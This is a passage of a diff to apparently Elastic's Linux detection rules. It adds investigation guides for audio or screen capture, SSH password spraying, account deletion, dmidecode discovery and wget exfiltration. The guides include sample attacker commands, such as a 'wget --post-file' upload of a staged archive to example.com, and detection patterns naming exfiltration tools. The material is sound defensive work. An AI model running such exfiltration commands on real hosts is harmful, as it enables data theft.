- A legitimate systemd or cron job starts arecord/parec/pw-record/pw-cat -r to periodically sample audio for device diagnostics or content creation, resulting in an uncommon parent process yet expected outputs under user or application directories.
### Response and remediation
- Immediately terminate arecord, parec, pw-record, ecasound, pw-cat -r, or ffmpeg processes launched by cron/systemd/ssh and stop any associated systemd units/timers, then block outbound RTMP/HTTP/SFTP connections from the recording user.
- Disable and remove persistence that invokes recording, including systemd .service/.timer files under /etc/systemd/system or ~/.config/systemd/user, cron entries in /etc/cron.* or user crontabs, and autostart scripts in ~/.config/autostart or /etc/xdg/autostart, and quarantine any unknown executables or wrappers in /tmp, /var/tmp, or hidden user directories that spawn these tools.
- Before cleanup, preserve the full command line and copies of recorded artifacts (WAV/MP3/OGG) located in ~/.cache, ~/.local/share, /tmp, /var/tmp, and hidden directories, then remove remaining audio files and staging folders after evidence collection.
- Verify recovery by confirming no active record nodes in PipeWire/PulseAudio and no further opens on /dev/snd/*, and restart affected user sessions or hosts if audio subsystem settings were altered.
- Harden by restricting access to /dev/snd/* via udev group membership and AppArmor/SELinux, whitelisting approved desktop apps, and adding detections to flag non-interactive parents launching arecord/ffmpeg or pw-cat -r and creation of large audio files in cache/temp paths.
- Escalate to incident response and privacy/legal if recording is initiated by a root-owned systemd service or an unknown binary in /tmp, or if audio streaming/exfiltration to external IPs/domains is observed.
"""
risk_score = 21
rule_id = "3ee526ce-1f26-45dd-9358-c23100d1121f"
severity = "low"
@@ -30,6 +61,7 @@ tags = [
"Data Source: Elastic Defend",
"Data Source: Elastic Endgame",
"Data Source: SentinelOne",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "new_terms"
@@ -2,7 +2,7 @@
creation_date = "2026/01/07"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
updated_date = "2026/01/07"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -20,6 +20,37 @@ index = [
language = "kuery"
license = "Elastic License v2"
name = "Linux Video Recording or Screenshot Activity Detected"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Linux Video Recording or Screenshot Activity Detected
This alert flags the launch of common Linux screenshot or screen-recording tools—such as scrot, gnome-screenshot, flameshot, grim, or obs—when triggered by an atypical parent process, indicating potential visual data collection. A typical attacker pattern is a compromised user session or remote shell spawning scrot or grim during credential entry to capture MFA codes and application windows, or starting simplescreenrecorder/obs to persistently record the desktop for later exfiltration.
### Possible investigation steps
- Review the process lineage and session context to determine if the capture was launched interactively from a desktop or via ssh/cron/systemd or a script in transient directories.
- Inspect command-line options and environment variables (DISPLAY, WAYLAND_DISPLAY, XAUTHORITY) to identify window/region capture, explicit save targets, or headless clipboard-only usage.
- Search for newly created media files around the alert time (screenshots under ~/Pictures or /tmp, and recordings like .mkv/.webm) and evaluate their sensitivity and relevance.
- Verify binary provenance and integrity by checking installation logs, file path and ownership, hashes, and unexpected copies or modified ELF binaries in user-writable locations.
- Correlate with user and network telemetry for concurrent credential entry, browser MFA prompts, or outbound transfers/clipboard synchronization indicative of exfiltration.
### False positive analysis
- A user presses Print Screen or uses a desktop hotkey, and the environment launches gnome-screenshot, flameshot, or grim via a keybinding/compositor component, producing an uncommon parent despite benign activity.
- Legitimate demo or documentation recording with obs or simplescreenrecorder started by a wrapper script, cron, or a systemd unit can surface as a non-interactive start from an unusual parent without malicious intent.
### Response and remediation
- Immediately terminate the capture process (e.g., scrot, grim, flameshot, gnome-screenshot, simplescreenrecorder, obs) and isolate the host or terminate the GUI session, suspending the user and revoking SSH keys if the parent was sshd, cron, or a systemd unit.
- Eradicate launch points by deleting rogue systemd services/timers, crontab entries, ~/.config/autostart/*.desktop files, and scripts in /tmp or ~/bin that invoke these tools, and replace any trojanized binaries found outside package-managed paths.
- Recover by rotating passwords and invalidating MFA sessions/tokens used during the recorded period, then remove captured media (.png/.jpg/.webm/.mkv) from ~/Pictures, /tmp, and similar staging paths after evidence collection.
- Escalate to incident response and privacy/legal if screenshots/recordings contain credentials, customer data, or secrets, if execution originated from privileged users or servers, or if exfiltration is observed via scp/rsync/curl to external hosts.
- Harden endpoints by uninstalling unneeded screenshot/recording packages, enforcing allowlists and AppArmor/SELinux profiles that block scrot/grim/obs except for approved users, and requiring xdg-desktop-portal/PipeWire screencast prompts for console users only.
- Improve detection by alerting on these binaries executed by sshd/cron/systemd, repeated saves under ~/Pictures or /tmp, copies in user-writable paths (~/bin, /tmp), and outbound transfers of resulting media files.
"""
risk_score = 21
rule_id = "93dd73f9-3e59-45be-b023-c681273baf81"
severity = "low"
@@ -31,6 +62,7 @@ tags = [
"Data Source: Elastic Defend",
"Data Source: Elastic Endgame",
"Data Source: SentinelOne",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "new_terms"
@@ -2,7 +2,7 @@
creation_date = "2025/12/24"
integration = ["system"]
maturity = "production"
updated_date = "2025/12/24"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -17,6 +17,36 @@ from = "now-9m"
language = "esql"
license = "Elastic License v2"
name = "Potential Password Spraying Attack via SSH"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Potential Password Spraying Attack via SSH
This rule flags bursts of failed SSH logins coming from the same network origin against many different Linux accounts within a short window, indicating password spraying that can precede account compromise. It matters because attackers try a small set of common passwords across broad user lists to evade lockouts and find one weak credential. A typical pattern is an external VPS rapidly trying passwords like “Welcome123” or “Spring2024!” against 30+ usernames (e.g., admin, test, ubuntu, devops) over five minutes via SSH on a single server.
### Possible investigation steps
- Check for any successful SSH authentications from the same source IP within a short window around the failures and, if found, pivot to session details such as interactive TTY use, sudo activity, and modifications like authorized_keys updates.
- Enrich the source IP with geolocation, ASN, reputation, and cloud-provider attribution and verify whether it is observed attempting SSH across multiple hosts to confirm a broad spray pattern.
- Compare the attempted usernames against your directory to identify valid and privileged or service accounts and confirm whether lockouts, password resets, or MFA challenges were triggered.
- Determine if the affected host is internet-exposed and which port SSH is reachable on, then review current SSH authentication settings (password vs key-based, PAM/MFA) to assess risk of compromise.
- Correlate the source IP with approved scanners, bastion hosts, or change tickets and maintenance windows to quickly rule out sanctioned testing or misconfigured monitoring.
### False positive analysis
- A misconfigured internal automation or admin script on a management or jump host sequentially attempts SSH to many accounts with an outdated password, producing more than 10 distinct usernames and at least 30 failures from a single source IP within five minutes.
- Legitimate users behind a shared NAT or bastion host concurrently attempt SSH with expired credentials during a password rotation or temporary authentication issue, making failures across many distinct usernames appear to come from one IP.
### Response and remediation
- Immediately block the spraying source IP(s) at host firewalls (iptables/nftables) and edge controls, and temporarily restrict SSH (port 22) to approved bastion/jump host CIDRs only.
- If any login succeeded or an sshd session from the same IP is active, terminate it, remove any newly added ~/.ssh/authorized_keys entries, and force password resets with MFA for the targeted users.
- Before restoring normal access, verify no persistence by checking for changes to /etc/ssh/sshd_config, sudoers, or cron jobs and reviewing /var/log/auth.log and lastlog for anomalies, then re-enable only required accounts.
- Escalate to incident response if privileged or service accounts were targeted, the spray spanned multiple servers, or there is evidence of sudo activity, file changes under /root or /etc, or a successful login, and preserve auth logs, bash histories, and firewall block artifacts.
- Harden SSH by disabling PasswordAuthentication, enforcing key-based auth with PAM MFA, setting conservative MaxAuthTries and LoginGraceTime, enabling fail2ban or equivalent bans, and restricting access via AllowUsers/AllowGroups and security group rules.
"""
risk_score = 21
rule_id = "9e81b1fd-e9fb-49a7-8ebe-0d1a14090142"
severity = "low"
@@ -25,6 +55,7 @@ tags = [
"OS: Linux",
"Use Case: Threat Detection",
"Tactic: Credential Access",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "esql"
@@ -2,7 +2,7 @@
creation_date = "2026/01/08"
integration = ["system"]
maturity = "production"
updated_date = "2026/01/08"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -15,6 +15,37 @@ index = ["filebeat-*", "logs-system.auth-*"]
language = "eql"
license = "Elastic License v2"
name = "Linux User or Group Deletion"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Linux User or Group Deletion
This rule surfaces successful deletions of Linux users or groups—activity that can erase evidence, hide persistence, or disrupt access control. A common pattern is an attacker with root rights running userdel -r to remove a temporary privileged account they used for access, deleting its home directory and mail spool to strip artifacts. Correlate with recent privilege escalation and changes to sudoers/wheel to identify whether this was malicious cleanup versus routine deprovisioning.
### Possible investigation steps
- Correlate with auth and sudo logs to identify the actor, session (TTY/SSH), and source IP that executed the deletion and confirm whether root was obtained via sudo or another escalation path.
- Inspect the process tree and command line to see if userdel/groupdel used -r to remove the home/mail spool and whether it was launched from an interactive shell, SSH session, or automation tooling.
- Validate expected deprovisioning by checking HR/ticketing/IdM and configuration-management activity around the time, and escalate if the deleted identity was privileged or part of sudo/wheel.
- Build a timeline around the event to find adjacent actions such as account creation, password or key changes, group membership edits, and modifications to /etc/passwd, /etc/group, /etc/shadow, or sudoers.
- Assess impact and persistence by locating services, cron/systemd units, files, ACLs, or running processes still referencing the deleted UID/GID, attempt recovery of the home/mail from backups, and look for wtmp/btmp/lastlog tampering.
### False positive analysis
- Scheduled deprovisioning or baseline enforcement where administrators intentionally remove stale local users or groups associated with retired projects, decommissioned systems, or role changes during maintenance.
- Package uninstall or system maintenance scripts that add a service account during setup and later remove it during cleanup, causing legitimate user/group deletion events.
### Response and remediation
- If the deletion is unauthorized, immediately isolate the host and restrict interactive access by setting PermitRootLogin no and tightening AllowUsers/AllowGroups in /etc/ssh/sshd_config, then systemctl restart sshd to apply.
- Review and clean authorization and persistence by inspecting /etc/sudoers and /etc/sudoers.d for unauthorized rules, checking wheel/sudo memberships in /etc/group, and purging cron or systemd units that reference the deleted UID/GID.
- Recover the identity if legitimate by recreating the user/group with the original UID/GID from /var/backups/{passwd,group,shadow}, restoring the corresponding /home directory and /var/spool/mail from backups, and reassigning orphaned files using find -nouser -nogroup to a valid account.
- Rotate credentials associated with the deleted identity by replacing SSH keys and secrets found in ~/.ssh/authorized_keys and application configs, and invalidate cached tokens and service account credentials that may have been shared.
- Escalate to incident response if the deleted account was privileged (present in wheel/sudo groups), userdel/groupdel used -r to remove the home/mail spool, or evidence of log tampering exists such as truncated /var/log/auth.log or altered wtmp/btmp/lastlog.
- Harden by centralizing local account lifecycle in IdM/LDAP, enforcing visudo-managed sudo changes, enabling auditd watches on /usr/sbin/userdel,/usr/sbin/groupdel and writes to /etc/passwd,/etc/group,/etc/shadow, and deploying AIDE to monitor integrity of /etc.
"""
risk_score = 21
rule_id = "8f8004e1-0783-485f-a3da-aca4362f74a7"
setup = """## Setup
@@ -43,6 +74,7 @@ tags = [
"OS: Linux",
"Use Case: Threat Detection",
"Tactic: Defense Evasion",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,7 +2,7 @@
creation_date = "2026/01/07"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
updated_date = "2026/01/07"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -20,6 +20,37 @@ index = [
language = "eql"
license = "Elastic License v2"
name = "System Information Discovery via dmidecode from Parent Shell"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating System Information Discovery via dmidecode from Parent Shell
This rule flags dmidecode launched from a parent shell, signaling collection of hardware and firmware inventory that adversaries use to profile a host and inform exploitation or lateral movement. A typical pattern is an intruder running bash -c 'dmidecode -t system -t bios' within a post-exploitation script to harvest model, serial, BIOS vendor, and hypervisor indicators, then tailoring payload choices or host-based evasion accordingly.
### Possible investigation steps
- Extract the full parent shell command payload to see exact dmidecode arguments, targeted DMI types, and any output redirection or piping to grep, gzip, curl, scp, or similar utilities indicating data collection or exfiltration.
- Correlate execution context by tying the parent shell to the user, TTY versus non-interactive origin (cron/systemd/SSH), source IP, and presence of unexpected sudo/root elevation to judge intent and privilege.
- Pivot on the parent PID and session to list adjacent commands within the timeline to identify broader discovery or staging chains and any script or binary loader used.
- Search for captured output by reviewing recent file writes under /tmp, /var/tmp, /dev/shm, and home directories for DMI dumps, hardware inventory files, or compressed archives, and triage ownership and timestamps.
- Investigate network activity from the shell and its children around the event for outbound connections, especially HTTP/S3/SSH transfers that could carry dmidecode output, and capture destination details for enrichment.
### False positive analysis
- A system administrator runs a shell with -c to execute dmidecode during manual troubleshooting; corroborate with an interactive TTY, a known admin user, and absence of adjacent collection or network activity.
- A legitimate cron or systemd maintenance/provisioning job calls a shell with -c to run dmidecode for hardware inventory; verify the scheduled unit or service, script location under /etc, and expected run cadence.
### Response and remediation
- Immediately kill the shell process running '-c "dmidecode ..."', terminate its children (e.g., grep, gzip, curl, scp), and isolate the host if the command chained output to a network transfer.
- Block observed exfil destinations by adding temporary egress rules for the IP/domain referenced in the parent shell (curl/wget/scp targets), and confiscate any DMI dumps or archives found under /tmp, /var/tmp, or /dev/shm.
- Remove persistence by deleting scripts and jobs that call dmidecode, including entries under /etc/cron.*, systemd units in /etc/systemd/system, or shell scripts dropped in home directories and /opt, and clear residual output files.
- Recover by validating integrity of /usr/sbin/dmidecode and shell binaries (bash/sh/zsh), restoring from backup if tampering is detected, and re-enable network only after rotating passwords and SSH keys for affected accounts.
- Escalate to incident response if dmidecode output is compressed/encoded then sent externally (e.g., '/tmp/dmi.txt.gz' piped to curl or scp), if run via sudo by an unexpected user, or observed on multiple hosts in a short window.
- Harden by restricting dmidecode use to approved scripts via sudoers and AppArmor/SELinux profiles, alerting on shell '-c' hardware inventory commands, auditing writes to /tmp and /var/tmp, and replacing ad-hoc inventory with signed, centrally managed tooling.
"""
references = ["https://research.checkpoint.com/2024/29676/"]
risk_score = 21
rule_id = "da0ebebe-5ad3-4277-95e7-889f5a69b959"
@@ -69,6 +100,7 @@ tags = [
"Data Source: Elastic Endgame",
"Data Source: Elastic Defend",
"Data Source: SentinelOne",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,7 +2,7 @@
creation_date = "2026/01/07"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
maturity = "production"
updated_date = "2026/01/07"
updated_date = "2026/01/12"
[rule]
author = ["Elastic"]
@@ -23,6 +23,37 @@ index = [
language = "eql"
license = "Elastic License v2"
name = "Potential Data Exfiltration Through Wget"
note = """ ## Triage and analysis
> **Disclaimer**:
> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
### Investigating Potential Data Exfiltration Through Wget
This rule flags Linux processes that launch wget with options that upload a local file via HTTP POST, a behavior used to exfiltrate staged data to an external server. Attackers gather files, compress them in /tmp, then execute wget --post-file=/tmp/loot.tar.gz https://example.com/upload from a non-interactive shell or cron job to covertly push the archive out over standard web traffic.
### Possible investigation steps
- Pull the full command line to extract the posted file path, verify the file still exists, capture size/timestamps, and hash its contents to gauge sensitivity and origin.
- Review the process tree and session context (parent, user, TTY, cron/systemd/container) and correlate with recent logins or scheduler entries to determine whether this was automated or a remote shell action.
- Enrich the destination endpoint with DNS, WHOIS, certificate, proxy, and egress firewall logs, and check for prior communications from this host to the same domain/IP to assess legitimacy.
- Pivot 3060 minutes prior on the host/user for staging activity such as tar/gzip in /tmp, bulk file collection, or discovery commands, and interrogate shell history and filesystem events tied to the posted file.
- If the file was removed post-upload, attempt recovery from EDR or backups and estimate exfil volume and content types via proxy or egress gateway logs to determine impact and drive containment.
### False positive analysis
- A maintenance or monitoring script run via cron posts log archives or configuration snapshots using wget --post-file to an internal HTTP endpoint for routine diagnostics.
- An administrator or developer testing a web form or API uses wget --body-file to POST a sample file during troubleshooting, producing a benign one-off event.
### Response and remediation
- Immediately isolate the host, terminate the offending wget process, block outbound HTTP(S) to the destination domain/IP seen in the command wget --post-file=/path/to/file https://example.com/upload, and quarantine the posted file path and its parent directory.
- Identify and disable any cron, systemd, or shell script that invoked wget with --post-file or --body-file (e.g., entries in /etc/cron.d/, user crontabs, or /home/user/.local/bin/upload.sh), delete the script, and revoke the invoking accounts API tokens and SSH keys.
- Remove staged archives and temp files referenced in the upload (e.g., /tmp/loot.tar.gz and /var/tmp/*.gz), delete companion tooling or collection scripts found alongside them, and reimage the host if system integrity cannot be assured.
- If the posted content includes credentials, source code, or customer data, rotate affected passwords/keys, invalidate tokens, notify data owners, and restore impacted systems or files from known-good backups.
- Escalate to incident response and initiate wider containment if the destination domain/IP is not owned by the organization or resolves to an anonymizing/VPS service, if multiple hosts exhibit wget --post-file from non-interactive sessions, or if the uploader executed as root.
- Harden by enforcing SELinux/AppArmor policies that restrict wget/curl from posting files, requiring egress web proxy allowlists for HTTP POST destinations, adding detections for wget --post-file/--body-file and curl --upload-file/-F, and removing wget from systems where it is unnecessary.
"""
references = ["https://gtfobins.github.io/gtfobins/wget/"]
risk_score = 47
rule_id = "8d8c0b55-ef27-4c20-959f-fa8dd3ac25e6"
@@ -62,6 +93,7 @@ tags = [
"Data Source: Crowdstrike",
"Data Source: SentinelOne",
"Data Source: Elastic Endgame",
"Resources: Investigation Guide",
]
timestamp_override = "event.ingested"
type = "eql"
@@ -2,9 +2,9 @@
creation_date = "2025/01/31"
integration = ["endpoint"]
maturity = "production"
updated_date = "2025/04/23"
min_stack_version = "9.0.0"
min_stack_comments = "The fields file.origin_referrer_url and file.origin_url were introduced in ECS as of version 9.0.0"
updated_date = "2026/01/12"
min_stack_version = "9.1.0"
min_stack_comments = "Changing min stack to 9.1.0, the latest minimum supported version for 9.X releases."
[rule]
author = ["Elastic"]